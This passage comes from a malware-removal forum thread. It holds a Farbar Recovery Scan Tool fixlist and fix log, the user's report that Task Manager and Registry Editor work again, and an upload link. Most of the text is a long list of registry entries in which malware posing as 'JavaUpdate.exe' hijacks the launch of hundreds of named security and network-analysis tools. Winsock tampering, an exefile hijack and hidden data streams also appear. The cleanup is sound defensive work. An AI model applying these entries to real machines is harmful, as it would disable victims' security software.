IFEO\nanosvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\navapsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nbrowser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netguard: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\netguardlite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nfservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\njeeves2.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nnf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nod32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nod32krn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nprosec.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\NS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nseupdatesvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nstzerospywarelite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvcod.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvcsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvoy.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nwscmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\oasclnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\omnitray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\OnAccessInstaller.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ONLINENT.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\opf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\opfsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\OPSSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\op_mon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\outpost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Packetizer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Packetyzer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pcipprev.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pctav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pctavsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pcviper.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\persfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pfft.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pgaccount.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\prevxcsi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\prifw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\privatefirewall: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\privatefirewall3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ProcessHacker.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procexp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procguard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\protect.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSANHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSUAMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSUAService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtSessionAgent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtSvcHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtWatchDog.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pxagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\QUHLPSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\rawshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\RDTask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\regedit.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\rtt_crc_service.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sab_wab.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sagui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SAPISSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SASCore64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SASTask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savadminservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savcleanup.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savcli.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savmain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savprogress.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBAMSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBAMTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBPIMSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SCANNER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SCANWSCS.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scfmanager.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scfservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\schedulerdaemon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scproxysrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ScSecSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevcon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevconIA.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevconx.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDFSSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdtrayapp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDWelcome.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\siteadv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sndsrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Sniffer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\snsmcon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\snsupd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SoftAct.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spfirewallsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sppfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spybotsd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SpyHunter3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spywareterminatorshield.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spywat~1.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sp_rsser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ssupdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SSUpdate64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SUPERAntiSpyware.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SUPERDelete.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Taskmgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Tcpdump.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\terminet.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Tethereal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\text2pcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\THGuard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tppfdmn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\TRAYICOS.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\TRAYSSER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\trigger.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tscutynt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tzpfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiSeAgnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiUpdateTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiWatchDog.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiWinMgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\umxagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\umxtray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UnThreat.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\updclient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UserAccountControlSettings.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\utsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UUpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uwcdsvr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Main.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Medic.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Proxy.ahn: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3SP.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Svc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Up.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VCATCH.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\vdtask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VIEWTCP.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VIPREUI.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\virusutilities.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VSDesktop.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\WebCompanion.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\webwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Windump.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\winroute.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\wireshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\wwasher.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\xauth_service.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\xfilter.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Zanda.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zerospywarele.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zerospywarelite_installer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Zlh.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zlhh.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe

GroupPolicy: Restriction <======= ATTENTION

Winsock: Catalog5 03 C:\Windows\SysWOW64\mswsock.dll [231424 2016-05-11] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 04 %SystemRoot%\System32\nwprovau.dll No File
Winsock: Catalog5-x64 01 C:\Windows\System32\mswsock.dll [327168 2016-05-11] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
cmd: netsh winsock reset

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> No File
Toolbar: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
FF user.js: detected! => C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\user.js [2016-09-16]
FF Extension: (No Name) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\temp [2009-10-15] [not signed]
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]

U3 alz4j5u7; C:\Windows\System32\Drivers\alz4j5u7.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 cpuz130; \??\C:\Users\Kevin\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X]
S3 NVIDIAHWAccess; \??\C:\Users\Kevin\AppData\Roaming\NVIDIA\HWAccess.sys [X]
S4 nvlddmkm; system32\DRIVERS\nvlddmkm.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 usbbus; system32\DRIVERS\lgx64bus.sys [X]
S3 UsbDiag; system32\DRIVERS\lgx64diag.sys [X]
S3 USBModem; system32\DRIVERS\lgx64modem.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

C:\ProgramData\tP5544K4.dat
C:\Users\Kevin\AppData\Local\Temp\svchost.exe

DeleteJunctionsIndirectory: C:\Windows\system64

AlternateDataStreams: C:\Program Files\Common Files\Microsoft Shared:9JWpxEmW4v11qmJOqJ7pjYs [2200]
AlternateDataStreams: C:\ProgramData\Microsoft:cyqnzX4eKYNTzpFQUfDk [2544]
AlternateDataStreams: C:\ProgramData\Microsoft:okPhkWKR99NHqk9eugRi0qqcLPl [615]
AlternateDataStreams: C:\ProgramData\TEMP:33384BC0 [99]
AlternateDataStreams: C:\ProgramData\TEMP:3A6BC948 [115]
AlternateDataStreams: C:\ProgramData\TEMP:89C2A42C [116]
AlternateDataStreams: C:\ProgramData\TEMP:91486201 [185]
AlternateDataStreams: C:\ProgramData\TEMP:D2A5A561 [112]
AlternateDataStreams: C:\ProgramData\TEMP:DED17083 [250]

HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Classes\exefile: "%1" %* <===== ATTENTION

Zip: C:\Users\Kevin\AppData\Local\05re0r73hpdmdp8g0u15a6u6kmy4;C:\ProgramData\r0t835ni0n1t18aj4n071sa4s7m;C:\TDSSKiller.3.1.0.11_14.10.2016_19.38.41_log.txt;C:\TDSSKiller.3.1.0.11_14.10.2016_19.37.30_log.txt

EmptyTemp:
  • Now name that file fixlist.txt
  • Please run FRST
  • Click the "fix" button.
  • Please copy and paste the fixlist.txt removal log into your reply.
  • A file called Upload.zip will be created on your desktop. Upload it to SendSpace and post the link in your reply

--------------------

 

Please copy and paste, include in your reply

  • FRST fixlog.txt
  • Sendspace download link
  • How is the machine running now? Does it start correctly? Any other immediate concerns?

TsVk!



#5 jumpman17

jumpman17
  • Topic Starter

  • Members
  • 25 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:03 PM

Posted 21 October 2016 - 07:09 AM

Thanks for working on this for me. This confirms my thought that it was a backdoor virus of some sort. However, I did pull my ethernet cable the second my computer locked up and I've blocked all incoming and outgoing connections in Windows Firewall to the IP address it was trying to connect to when I had it disconnected from the internet. I also changed my bank account password from my phone that day as well as a precaution. I don't want to go through the hassle of wiping the drive and reinstalling Windows, and I think I'll be ok, but I understand what you are saying about no way to be sure.

 

As for how it's running now, Task Manager and Registry Editor both work again, so that's fixed.

 

Here is the zip file. I had deleted the TDSS Killer logs the other day, so those aren't in there. I can rerun the program though if you want a report from that though. https://www.sendspace.com/file/235aly

 

Here is the removal log:

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Kevin (21-10-2016 07:44:03) Run:1
Running from C:\Users\Kevin\Desktop
Loaded Profiles: Kevin (Available Profiles: Kevin)
Boot Mode: Normal
==============================================

fixlist content:
*****************
HKLM-x32\...\Run: [] => [X]

IFEO: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\acs.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareDesktop.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\adoronsfirewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AgentSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\alertwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ALMon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ALsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\alupdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AntiHook.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\app_firewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\apvxdwin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\armorwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\as3pf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\asr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\aupdrun.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\authfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avas.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AvastSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AvastUi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avcom.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVK.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKProxy.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avkwctl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKWCtlx64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avkwctrl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avmgma.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avpmapp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avtask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\aws.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\backgroundscanclient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Bav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bavhm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavUpdater.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavWebClient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BDSSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bgctl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bgnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BgScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blackd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blackice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blinksvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bootsafe.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuardUpdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuarScanner.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\capinfos.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavApp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cavasm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavAUD.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavCons.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavEmSrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavmr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavMud.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavoar.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavQ.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavSn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavSub.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
